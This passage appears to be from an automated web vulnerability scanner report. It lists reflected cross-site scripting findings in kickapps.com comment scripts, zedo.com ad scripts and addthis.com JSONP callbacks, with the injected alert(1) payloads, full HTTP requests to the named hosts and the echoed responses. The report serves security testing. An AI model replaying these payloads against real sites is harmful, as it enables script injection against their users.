alert(1)//8cda9d9ad91
&fromDate=04-06-2011
/**
Array
(
[url] => ht
...[SNIP]...

1.68. http://clientapps.kickapps.com/hearst/comments/cnr_100plus.php [dName parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://clientapps.kickapps.com
Path:   /hearst/comments/cnr_100plus.php

Issue detail

The value of the dName request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8676a'%3balert(1)//8c88e991541 was submitted in the dName parameter. This input was echoed as 8676a';alert(1)//8c88e991541 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hearst/comments/cnr_100plus.php?id=http://www.wptz.com/news/27483035/detail.html&d=The+head+of+the+Vermont+National+Guard+says+a+federal+shutdown+would+put+around+400+members+on+furlough+and+hundreds+more+working+but+unsure+when+they+would+be+paid.&n=Guard+Prepares+For+Possible+Federal+Shutdown&as=62976&tzAbbr=EST&pSize=&dName=8676a'%3balert(1)//8c88e991541&loginAtBottom= HTTP/1.1
Host: clientapps.kickapps.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/27483035/detail.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 09 Apr 2011 12:32:26 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Host,Accept-Encoding
Cache-Control: max-age=1
Expires: Sat, 09 Apr 2011 12:32:27 GMT
P3P: policyref="http://www.yuku.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa HISa OUR NOR IND PHY ONL UNI COM NAV INT DEM PRE LOC"
Content-Length: 87684

var ka_version_number = "1.71";
var ka_external_url = "http%3A%2F%2Fwww.wptz.com%2Fnews%2F27483035%2Fdetail.html";
var ka_adminUser = 'wptz';
var ka_commentsList = "";
var ka_as = "62976";
var ka_totS
...[SNIP]...
place holder in case you need to check domain hosting js
   return true;
}

function ka_start() {
   if (!ka_verifyDomain()){
   }
   else {
       var comment_content_container = document.getElementById('8676a';alert(1)//8c88e991541');
       if (comment_content_container == null) {
    var bod = document.body;
    comments = document.createElement('div');
    comments.setAttribute("id", "867
...[SNIP]...

1.69. http://clientapps.kickapps.com/hearst/comments/cnr_100plus.php [dName parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://clientapps.kickapps.com
Path:   /hearst/comments/cnr_100plus.php

Issue detail

The value of the dName request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f2f2f"%3balert(1)//db5a3dbef58 was submitted in the dName parameter. This input was echoed as f2f2f";alert(1)//db5a3dbef58 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hearst/comments/cnr_100plus.php?id=http://www.wptz.com/news/27483035/detail.html&d=The+head+of+the+Vermont+National+Guard+says+a+federal+shutdown+would+put+around+400+members+on+furlough+and+hundreds+more+working+but+unsure+when+they+would+be+paid.&n=Guard+Prepares+For+Possible+Federal+Shutdown&as=62976&tzAbbr=EST&pSize=&dName=f2f2f"%3balert(1)//db5a3dbef58&loginAtBottom= HTTP/1.1
Host: clientapps.kickapps.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/27483035/detail.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 09 Apr 2011 12:32:23 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Host,Accept-Encoding
Cache-Control: max-age=1
Expires: Sat, 09 Apr 2011 12:32:24 GMT
P3P: policyref="http://www.yuku.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa HISa OUR NOR IND PHY ONL UNI COM NAV INT DEM PRE LOC"
Content-Length: 87684

var ka_version_number = "1.71";
var ka_external_url = "http%3A%2F%2Fwww.wptz.com%2Fnews%2F27483035%2Fdetail.html";
var ka_adminUser = 'wptz';
var ka_commentsList = "";
var ka_as = "62976";
var ka_totS
...[SNIP]...
f58');
       if (comment_content_container == null) {
    var bod = document.body;
    comments = document.createElement('div');
    comments.setAttribute("id", "f2f2f";alert(1)//db5a3dbef58");
    bod.appendChild(comments);
       }
       ka_writeContainer();
       var commentsAdd = document.getElementById('ka_orig_button');
if (commentsAdd == null) {
var bo
...[SNIP]...

1.70. http://clientapps.kickapps.com/hearst/comments/cnr_100plus.php [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://clientapps.kickapps.com
Path:   /hearst/comments/cnr_100plus.php

Issue detail

The value of the id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 53a11'%3balert(1)//ce95be82201 was submitted in the id parameter. This input was echoed as 53a11';alert(1)//ce95be82201 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hearst/comments/cnr_100plus.php?id=http://www.wptz.com/news/27483035/detail.html53a11'%3balert(1)//ce95be82201&d=The+head+of+the+Vermont+National+Guard+says+a+federal+shutdown+would+put+around+400+members+on+furlough+and+hundreds+more+working+but+unsure+when+they+would+be+paid.&n=Guard+Prepares+For+Possible+Federal+Shutdown&as=62976&tzAbbr=EST&pSize=&dName=&loginAtBottom= HTTP/1.1
Host: clientapps.kickapps.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/27483035/detail.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 09 Apr 2011 12:31:57 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Host,Accept-Encoding
Cache-Control: max-age=1
Expires: Sat, 09 Apr 2011 12:31:58 GMT
P3P: policyref="http://www.yuku.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa HISa OUR NOR IND PHY ONL UNI COM NAV INT DEM PRE LOC"
Content-Length: 89133

var ka_version_number = "1.71";
var ka_external_url = "http%3A%2F%2Fwww.wptz.com%2Fnews%2F27483035%2Fdetail.html53a11%27%3Balert%281%29%2F%2Fce95be82201";
var ka_adminUser = 'wptz';
var ka_commentsLis
...[SNIP]...
acebook.get_sessionState().waitUntilReady(function() {
var attachment = {'name':'Guard Prepares For Possible Federal Shutdown','href':'http://www.wptz.com/news/27483035/detail.html53a11';alert(1)//ce95be82201','description':commentText,'caption':'{*actor*} commented on this article.'};
FB.Connect.streamPublish(noQuoteText, attachment, null, null,'',null);
});

...[SNIP]...

1.71. http://clientapps.kickapps.com/hearst/comments/cnr_100plus.php [pSize parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://clientapps.kickapps.com
Path:   /hearst/comments/cnr_100plus.php

Issue detail

The value of the pSize request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 2660d%3balert(1)//b550bd280e9 was submitted in the pSize parameter. This input was echoed as 2660d;alert(1)//b550bd280e9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hearst/comments/cnr_100plus.php?id=http://www.wptz.com/news/27483035/detail.html&d=The+head+of+the+Vermont+National+Guard+says+a+federal+shutdown+would+put+around+400+members+on+furlough+and+hundreds+more+working+but+unsure+when+they+would+be+paid.&n=Guard+Prepares+For+Possible+Federal+Shutdown&as=62976&tzAbbr=EST&pSize=2660d%3balert(1)//b550bd280e9&dName=&loginAtBottom= HTTP/1.1
Host: clientapps.kickapps.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/27483035/detail.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 09 Apr 2011 12:32:20 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Host,Accept-Encoding
Cache-Control: max-age=1
Expires: Sat, 09 Apr 2011 12:32:21 GMT
P3P: policyref="http://www.yuku.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa HISa OUR NOR IND PHY ONL UNI COM NAV INT DEM PRE LOC"
Content-Length: 87727

var ka_version_number = "1.71";
var ka_external_url = "http%3A%2F%2Fwww.wptz.com%2Fnews%2F27483035%2Fdetail.html";
var ka_adminUser = 'wptz';
var ka_commentsList = "";
var ka_as = "62976";
var ka_totS
...[SNIP]...
isRatedByMe: F
var ka_mediaId = "1234";
var ka_isRatedByMe = "";
var ka_mediaTags = "";
var ka_alertBadLoginMsg = "Log in Failed. Please check your login credentials and try again.";
var ka_pageSize = 2660d;alert(1)//b550bd280e9;
var ka_forgotPasswdLink = 'http://ulocal.wptz.com/user/displayUserForgotPwd.kickAction?as=62976&STATUS=MAIN';
var ka_timezoneAbbr ='EST';
var ka_timezoneOffset = -4;
/********************************
...[SNIP]...

1.72. http://clientapps.kickapps.com/hearst/comments/cnr_100plus.php [tzAbbr parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://clientapps.kickapps.com
Path:   /hearst/comments/cnr_100plus.php

Issue detail

The value of the tzAbbr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e88bb'%3balert(1)//6b713801453 was submitted in the tzAbbr parameter. This input was echoed as e88bb';alert(1)//6b713801453 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hearst/comments/cnr_100plus.php?id=http://www.wptz.com/news/27483035/detail.html&d=The+head+of+the+Vermont+National+Guard+says+a+federal+shutdown+would+put+around+400+members+on+furlough+and+hundreds+more+working+but+unsure+when+they+would+be+paid.&n=Guard+Prepares+For+Possible+Federal+Shutdown&as=62976&tzAbbr=ESTe88bb'%3balert(1)//6b713801453&pSize=&dName=&loginAtBottom= HTTP/1.1
Host: clientapps.kickapps.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/27483035/detail.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 09 Apr 2011 12:32:17 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Host,Accept-Encoding
Cache-Control: max-age=1
Expires: Sat, 09 Apr 2011 12:32:18 GMT
P3P: policyref="http://www.yuku.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa HISa OUR NOR IND PHY ONL UNI COM NAV INT DEM PRE LOC"
Content-Length: 87703

var ka_version_number = "1.71";
var ka_external_url = "http%3A%2F%2Fwww.wptz.com%2Fnews%2F27483035%2Fdetail.html";
var ka_adminUser = 'wptz';
var ka_commentsList = "";
var ka_as = "62976";
var ka_totS
...[SNIP]...
heck your login credentials and try again.";
var ka_pageSize = 5;
var ka_forgotPasswdLink = 'http://ulocal.wptz.com/user/displayUserForgotPwd.kickAction?as=62976&STATUS=MAIN';
var ka_timezoneAbbr ='ESTe88bb';alert(1)//6b713801453';
var ka_timezoneOffset = -7;
/**********************************************************
* Globals
**********************************************************/
if(typeof(RPXNOW)!="undefined"){
   
...[SNIP]...

1.73. http://clientapps.kickapps.com/hearst/comments/start.php [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://clientapps.kickapps.com
Path:   /hearst/comments/start.php

Issue detail

The value of the id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9cdc2'%3balert(1)//f7110da1efd was submitted in the id parameter. This input was echoed as 9cdc2';alert(1)//f7110da1efd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hearst/comments/start.php?as=62976&id=http://www.wptz.com/news/27483035/detail.html9cdc2'%3balert(1)//f7110da1efd&n=Guard%20Prepares%20For%20Possible%20Federal%20Shutdown&d=The%20head%20of%20the%20Vermont%20National%20Guard%20says%20a%20federal%20shutdown%20would%20put%20around%20400%20members%20on%20furlough%20and%20hundreds%20more%20working%20but%20unsure%20when%20they%20would%20be%20paid.&tzAbbr=EST HTTP/1.1
Host: clientapps.kickapps.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/27483035/detail.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 09 Apr 2011 12:31:30 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Host,Accept-Encoding
Cache-Control: max-age=1
Expires: Sat, 09 Apr 2011 12:31:31 GMT
P3P: policyref="http://www.yuku.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa HISa OUR NOR IND PHY ONL UNI COM NAV INT DEM PRE LOC"
Content-Length: 941

function verifyDomain() {
   var currentLocation = new String(window.location.href);
   var ka_communitySite = new String('http://ulocal.wptz.com/');
   //alert('current location:'+currentLocation+' ka_comm
...[SNIP]...
ion.indexOf(ka_communitySite)!=-1){
       return false;
   }
   return true;
}

var ka_request = 'http://clientapps.kickapps.com/hearst/comments/cnr_100plus.php?id=http://www.wptz.com/news/27483035/detail.html9cdc2';alert(1)//f7110da1efd&d=The+head+of+the+Vermont+National+Guard+says+a+federal+shutdown+would+put+around+400+members+on+furlough+and+hundreds+more+working+but+unsure+when+they+would+be+paid.&n=Guard+Prepares+For+Possible+Fe
...[SNIP]...

1.74. http://clientapps.kickapps.com/hearst/comments/start.php [tzAbbr parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://clientapps.kickapps.com
Path:   /hearst/comments/start.php

Issue detail

The value of the tzAbbr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c020a'%3balert(1)//c58225a0fcb was submitted in the tzAbbr parameter. This input was echoed as c020a';alert(1)//c58225a0fcb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hearst/comments/start.php?as=62976&id=http://www.wptz.com/news/27483035/detail.html&n=Guard%20Prepares%20For%20Possible%20Federal%20Shutdown&d=The%20head%20of%20the%20Vermont%20National%20Guard%20says%20a%20federal%20shutdown%20would%20put%20around%20400%20members%20on%20furlough%20and%20hundreds%20more%20working%20but%20unsure%20when%20they%20would%20be%20paid.&tzAbbr=ESTc020a'%3balert(1)//c58225a0fcb HTTP/1.1
Host: clientapps.kickapps.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/27483035/detail.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 09 Apr 2011 12:31:53 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Host,Accept-Encoding
Cache-Control: max-age=1
Expires: Sat, 09 Apr 2011 12:31:54 GMT
P3P: policyref="http://www.yuku.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa HISa OUR NOR IND PHY ONL UNI COM NAV INT DEM PRE LOC"
Content-Length: 941

function verifyDomain() {
   var currentLocation = new String(window.location.href);
   var ka_communitySite = new String('http://ulocal.wptz.com/');
   //alert('current location:'+currentLocation+' ka_comm
...[SNIP]...
l+Guard+says+a+federal+shutdown+would+put+around+400+members+on+furlough+and+hundreds+more+working+but+unsure+when+they+would+be+paid.&n=Guard+Prepares+For+Possible+Federal+Shutdown&as=62976&tzAbbr=ESTc020a';alert(1)//c58225a0fcb&pSize=&dName=&loginAtBottom=';
if (verifyDomain()){
   ka_loadCommentsForm();

   
}

function ka_loadCommentsForm(){
   
       
       aObj = new JSONscriptRequest(ka_request);
       aObj.buildScriptTag();
       
...[SNIP]...

1.75. http://d7.zedo.com/jsc/d3/fl.js [l parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /jsc/d3/fl.js

Issue detail

The value of the l request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ed80e"-alert(1)-"40a53fb6c70 was submitted in the l parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jsc/d3/fl.js?n=1318&c=43/41&s=17&d=14&w=728&h=90&l=http://clk.redcated/go/248038904/direct;wi.728;hi.90;ai.206431965.206955035;ct.1/01%3Fhref=ed80e"-alert(1)-"40a53fb6c70&z=144475929 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://redcated/APM/iview/248038904/direct;wi.728;hi.90/01?click=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFgeo=2241452;expires=Tue, 10 Apr 2012 16:41:23 GMT;domain=.zedo.com;path=/;
Set-Cookie: ZEDOIDA=My@jTcGt89atDQZBkeuqQvnQ~041111;expires=Thu, 08 Apr 2021 16:41:23 GMT;domain=.zedo.com;path=/;
ETag: "7140dca9-4239-48dea89497900"
Vary: Accept-Encoding
X-Varnish: 2551699253
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=33
Date: Mon, 11 Apr 2011 16:41:23 GMT
Connection: close
Content-Length: 3161

// Copyright (c) 2000-2008 ZEDO Inc. All Rights Reserved.

var w0=new Image();

var zzStr="q=;z="+Math.random();var zzSection=17;var zzPat='';

var zzhasAd;


               
...[SNIP]...
7;g=172;m=34;w=51;i=0;u=unknown;" + zzStr + zzIdxNw + zzIdxCh + zzIdxPub + zzIdxPos + zzIdxClk + ainfo + ";k=http://clk.redcated/go/248038904/direct;wi.728;hi.90;ai.206431965.206955035;ct.1/01%3Fhref=ed80e"-alert(1)-"40a53fb6c70http://www.newsmax.com/surveys/DonaldTrump/Donald-Trump-for-President-/id/11/kw/default?PROMO_CODE=BF8D-1\" TARGET=\"_blank\" onMouseOver='window.status=\" Ad powered by ZEDO\"; return true;' onMouseOu
...[SNIP]...

1.76. http://d7.zedo.com/jsc/d3/fl.js [l parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /jsc/d3/fl.js

Issue detail

The value of the l request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3f741"-alert(1)-"6ea924cc82f was submitted in the l parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jsc/d3/fl.js?n=1318&c=43/41&s=17&d=14&w=728&h=90&l=http://clk.redcated/go/248038904/direct;wi.728;hi.90;ai.206431965.206955035;ct.1/01%3Fhref=3f741"-alert(1)-"6ea924cc82f&z=655102444 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://redcated/APM/iview/248038904/direct;wi.728;hi.90/01?click=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZCBC=1; ZEDOIDA=Ly@jTcGt89Y-7tVXMtikPSik~041111; FFgeo=2241452; ZEDOIDX=29

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
ETag: "199c199-4429-48dea89497900"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
X-Varnish: 1482268137
Cache-Control: max-age=185
Expires: Mon, 11 Apr 2011 17:24:30 GMT
Date: Mon, 11 Apr 2011 17:21:25 GMT
Connection: close
Content-Length: 2164

// Copyright (c) 2000-2008 ZEDO Inc. All Rights Reserved.

var w0=new Image();

var zzStr="q=;z="+Math.random();var zzSection=17;var zzPat='';

var zzhasAd;


                   var zzSt
...[SNIP]...
=unknown;p=6;f=1045847;h=966322;" + zzStr + zzIdxNw + zzIdxCh + zzIdxPub + zzIdxPos + zzIdxClk + ainfo + ";k=http://clk.redcated/go/248038904/direct;wi.728;hi.90;ai.206431965.206955035;ct.1/01%3Fhref=3f741"-alert(1)-"6ea924cc82fhttp://news1.newsmax.com/repeal/?PROMO_CODE=BE0A-1\" TARGET=\"_blank\" onMouseOver='window.status=\" Ad powered by ZEDO\"; return true;' onMouseOut='window.status=\"\"; return true;'>
...[SNIP]...

1.77. http://d7.zedo.com/lar/v10-003/d7/jsc/flr.js [l parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /lar/v10-003/d7/jsc/flr.js

Issue detail

The value of the l request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6171f"-alert(1)-"f47e5bad5e1 was submitted in the l parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /lar/v10-003/d7/jsc/flr.js?n=1318&c=43/41&s=17&d=14&w=728&h=90&l=http://clk.redcated/go/248038904/direct;wi.728;hi.90;ai.206431965.206955035;ct.1/01%3Fhref=6171f"-alert(1)-"f47e5bad5e1&z=144475929 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://redcated/APM/iview/248038904/direct;wi.728;hi.90/01?click=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFgeo=2241452;expires=Tue, 10 Apr 2012 16:41:25 GMT;domain=.zedo.com;path=/;
Set-Cookie: ZEDOIDA=NS@jTcGt89Z-2ItluoIEWYR-~041111;expires=Thu, 08 Apr 2021 16:41:25 GMT;domain=.zedo.com;path=/;
ETag: "7140dca9-4239-48dea89497900"
Vary: Accept-Encoding
X-Varnish: 2551699253
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=31
Date: Mon, 11 Apr 2011 16:41:25 GMT
Connection: close
Content-Length: 3120

// Copyright (c) 2000-2008 ZEDO Inc. All Rights Reserved.

var w0=new Image();

var zzStr="q=;z="+Math.random();var zzSection=17;var zzPat='';

var zzhasAd;


               
...[SNIP]...
=unknown;p=6;f=1045847;h=966322;" + zzStr + zzIdxNw + zzIdxCh + zzIdxPub + zzIdxPos + zzIdxClk + ainfo + ";k=http://clk.redcated/go/248038904/direct;wi.728;hi.90;ai.206431965.206955035;ct.1/01%3Fhref=6171f"-alert(1)-"f47e5bad5e1http://news1.newsmax.com/repeal/?PROMO_CODE=BE0A-1\" TARGET=\"_blank\" onMouseOver='window.status=\" Ad powered by ZEDO\"; return true;' onMouseOut='window.status=\"\"; return true;'>
...[SNIP]...

1.78. http://ds.addthis.com/red/psi/sites/www.ingeniux.com/p.json [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.ingeniux.com/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 13036<script>alert(1)</script>2aba7ef527a was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/www.ingeniux.com/p.json?callback=_ate.ad.hpr13036<script>alert(1)</script>2aba7ef527a&uid=4d97b40ad252fd37&url=http%3A%2F%2Fwww.ingeniux.com%2Fsolutions%2Fwebsite_optimization&1rvjqwy HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh38.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; dt=X; di=%7B%7D..1302197723.1FE|1302197723.60|1302197723.66; psc=4; uid=4d97b40ad252fd37

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 373
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Sat, 09 Apr 2011 00:18:16 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Mon, 09 May 2011 00:18:16 GMT; Path=/
Set-Cookie: di=%7B%7D..1302308296.1FE|1302308296.60|1302197723.66; Domain=.addthis.com; Expires=Mon, 08-Apr-2013 00:18:15 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Sat, 09 Apr 2011 00:18:16 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 09 Apr 2011 00:18:16 GMT
Connection: close

_ate.ad.hpr13036<script>alert(1)</script>2aba7ef527a({"urls":["http://pixel.33across.com/ps/?pid=454&uid=4d97b40ad252fd37","http://cspix.media6degrees.com/orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4d97b40ad252fd37&curl=http%3a%2f%2fwww.ingeniu
...[SNIP]...

1.79. http://ds.addthis.com/red/psi/sites/www.marqui.com/p.json [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.marqui.com/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 66809<script>alert(1)</script>0ed15865e19 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

